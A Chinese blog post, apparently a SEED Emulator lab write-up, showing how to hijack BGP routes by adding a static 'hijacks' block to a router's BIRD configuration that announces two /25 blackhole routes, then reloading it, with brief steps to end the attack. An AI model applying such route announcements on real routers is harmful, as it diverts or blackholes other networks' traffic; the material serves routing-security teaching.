seed emulator 环境下对网络拓扑进行bgp攻击

已于 2022-06-02 11:55:54 修改
阅读量343 收藏 1
点赞数
分类专栏: ubuntu-seed实验 文章标签: 网络安全 python
于 2022-04-21 23:40:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43737395/article/details/124334593
版权
本文详细描述了如何通过调整Bird路由器配置,利用ICMP检查路径一致性,实现对特定网络的BGP攻击,将流量引导至攻击路由器,并介绍了停止攻击的方法。涉及的步骤包括配置静态路由、添加攻击策略和重新配置BIRD。
摘要由CSDN通过智能技术生成

正常路径:

最左结点 ping 10.154.0.71(最右节点)
filter写icmp,如果显示来去路径则不一致,再添上&&dst = 10.154.0.71
在这里插入图片描述
选取任意其他连通的router(注意不是主机,只有router才有bird)进行bgp攻击,修改conf文件

cd /etc
cd bird
vi bird.conf

在最末尾加上这个
在这里插入图片描述

protocol static hijacks{
    ipv4{
       table t_bgp;
    };
    route 10.154.0.0/25 blackhole { bgp_large_community.add(LOCAL_COMM);};
    route 10.154.0.128/25 blackhole { bgp_large_community.add(LOCAL_COMM);};
}

root@bc8e1b39887f /etc/bird # birdc configure
BIRD 2.0.7 ready.
Reading configuration from /etc/bird/bird.conf
Reconfigured

然后流量就会被导入到攻击router上,攻击成功。

如果想要结束攻击,除了修改configure,也可以直接disable 攻击router与as的连接。
PUdd
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BGP路径劫持攻击
weixin_33779515的博客
03-04 2758
一、概述 斯坦福大学计算机网络CS144课程实验:基于Mininet实现BGP路径劫持攻击演示。 1、1 BGP概述 首先互联网整体上来说是一个分布式的网络,并没有整个网络的中心。但是整个互联网实际上是由成百上千个不同的ISP的子网络组成的。 这些子网络互相连接,通过BGP协议告诉对方自己子网络里都包括哪些IP地址段,自己的AS编号(AS Number)以及一些其他的信息。 这里又要扯到互联网的I...
seed-emulator:自建任意小型网络并成功编译+可视化+ping通
捡破烂日记^ ^
03-08 5936
自建小网络遇到的问题设计的小小网络拓扑代码最终成型连通性反思与总结 遇到的问题 首先说明一下我遇到的三个问题: 第一就是关于[]的疑惑,加与不加会有什么不同吗? 第二是我自己设计了一个网络拓扑,但是总是出现这个问题 就是线程池冲突。我折腾了一早上本来准备早早改完bug下午实现自动化脚本了,结果愣是没发现问题在哪;到了晚上我寻思着重新实现一个不带这一块拓扑结构的(因为我也觉得可能有点问题),结果就正常通过可视化工作了。按理说一个router是可以连接3个net的,以及我试过杀掉其他docker进程,但是似乎
Mininet实验 基于Mininet实现BGP路径挟持攻击实验
weixin_34233679的博客
11-23 649
参考:基于Mininet实现BGP路径挟持攻击实验 实验目的: 掌握如何mininet内模拟AS。 掌握BGP路径挟持的原理和分析过程。 实验原理: 互联网是由相互连接的自治系统AS组成的,通过一个通用的边界网关协议(BGP进行交互彼此的路由信息。如果利用BGP进行特殊攻击,比如一个伪装的AS伪造了一个更短的路径到前缀P,其他的AS要路由到前缀P时就会选择这个更短的路径,受到感染的AS会把该攻击...
SEED-XDS510Plus Emulator for CCS4.3
03-07
SEED-XDS510Plus Emulator CCS4.3 dsp仿真器驱动 这么多
SEED-XDS510Plus Emulator for CCS4.x_x64
11-28
SEED-XDS510Plus Emulator for CCS4.x_x64
Network Emulator Toolkit x64:在Windows下,模拟网络环境(丢包,延迟,带宽)的软件,亲测可用
08-08
通过使用NETKTT,开发者可以无需依赖实际网络环境,就能对应用程序进行深度测试。 二、主要功能 1. **丢包模拟**:NETKTT可以设置特定的丢包率,模拟网络中的数据包丢失情况,帮助开发者了解应用在低质量网络环境下...
Network Emulator for Windows Toolkit(模拟网络环境的软件)1
08-08
Network Emulator for Windows Toolkit(NEWT)是Windows平台上的一款网络仿真工具,旨在模拟网络环境,帮助开发者测试应用程序在不稳定网络环境下的表现。 Network Emulator for Windows Toolkit(NEWT)是专门...
虚拟环境网络安全实验系统的构建.pdf
09-20
【虚拟环境网络安全实验系统的构建】 随着信息技术的飞速发展,网络安全成为了越来越重要的议题。传统的网络安全实验系统往往不能满足不同专业教学的需求,而虚拟环境的出现则为这个问题提供了新的解决方案。本文...
GNTE:简单的全球网络拓扑模拟
02-05
GNTE(全局网络拓扑仿真器)是基于docker的多合一不稳定全局网络仿真器。 它模拟功能,例如随机延迟和数据包丢失。 使用前 安装泊坞窗 生成并运行 1.构建docker镜像 克隆此仓库并运行build.sh 。 您的docker环境中...
Seed Emulator(二)—— Botnet
qq_43498820的博客
08-20 1141
0x01 搭建botnet环境 1. 构建基础网络模型 # 进入B00迷你网络模型 cd seed/examples/B00-mini-internet # 运行脚本生成base-component.bin python3 mini-internet.py 2. 生成Botnet网络设备 # 进入B05僵尸网络 cd seed/examples/B05-botnet # 运行脚本生成 output容器目录 python3 botnet-basic.py 3. 修改部分dock.
SEED-XDS510Plus Emulator for CCS4.x&Above.exe
07-19
SEED-XDS510Plus Emulator for CCS4.x&Above.exe
SEED-XDS560v2PLUS Emulator Driver (4.x)
10-19
SEED-XDS560v2PLUS Emulator Driver (4.x)
使用SEED互联网平台仿真器创建小型网络python程序)
捡破烂日记^ ^
03-04 4177
本文是基于seed emulator 以一种通用思路搭建网络,今后网络均可参考 from seedemu import * # 为方便起见import 所有library emu = Emulator() # 大部分情况下import一个emulator就够了 base = Base() # Base layer的创建
Seed Emulator(一)—— 环境搭建
qq_43498820的博客
08-18 1681
0x01 环境准备 操作系统:ubuntu20.04 安装 docker-compose sudo apt-get install docker-compose 安装docker sudo apt-get install docker 下载seed-emulator-master git clone https://github.com/seed-labs/seed-emulator.git 0x02 测试案例运行 接下来使用项目中exa
在VirtualBox上自己搭建SEEDEmulator虚拟机(Ubuntu20.04内含Ubuntu22.04地址)
m0_52559974的博客
08-15 2121
从今天起打算搭一个虚拟机,配置docker容器,安装互联网模拟器,尝试一些实验。此篇为在VirtualBox上搭建虚拟机,环境为Ubuntu22.04。下一篇介绍docker的配置和互联网模拟SEED
BGP路径劫持攻击实验
最新发布
xiao_ZHEDA的博客
08-25 367
就是通过设置中间的流氓AS,假装提供一个更短的路径,从而使得BGP协议找到的路径是被劫持的
seed emulator docker环境进行telnet弱密码攻击
捡破烂日记^ ^
05-05 306
1 原理 很简单,就是host B想远程登录到host A,需要试密码 2 部署与攻击 2.1 host A: 2.1.1 预装telnet、telnetd、iptables、openbsd-inetd软件 使用apt-get install 就可以。 2.1.2 开启23端口并重启服务 iptables -I INPUT -p tcp --dport 23 -j ACCEPT cd etc/init.d ./openbsd-inetd restart 这样就开启服务了,不放心的话可以再装一个lsof软件
深入探讨SDN拓扑发现机制:新的攻击及实践对策【SDN拓扑】(下)
谈论现实
12-01 3402
An In-depth Look Into SDN Topology Discovery Mechanisms: Novel Attacks and PracticalCountermeasures实验室设置拓扑防御系统的安全性分析TopoGuard/TopoGuard+跟踪链路延迟的不安全机制攻击1攻击2在LLDP数据包中缺乏新鲜度攻击Stealthy Probing-Based Verification (SPV)探测数据包中的混淆度不足攻击使用LineSweep algorithm攻击SecureBi
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8390
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Xen虚拟化环境下的网络配置与UML实践
本文档深入探讨了在Xen虚拟化环境中配置网络的方法,特别是如何确保 guests(domU,即Guest Operating Systems)能够正常连接网络。文章由 Matthew Steggink 编写,他在 InterNetwork and Routing (INR) 和 Large ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值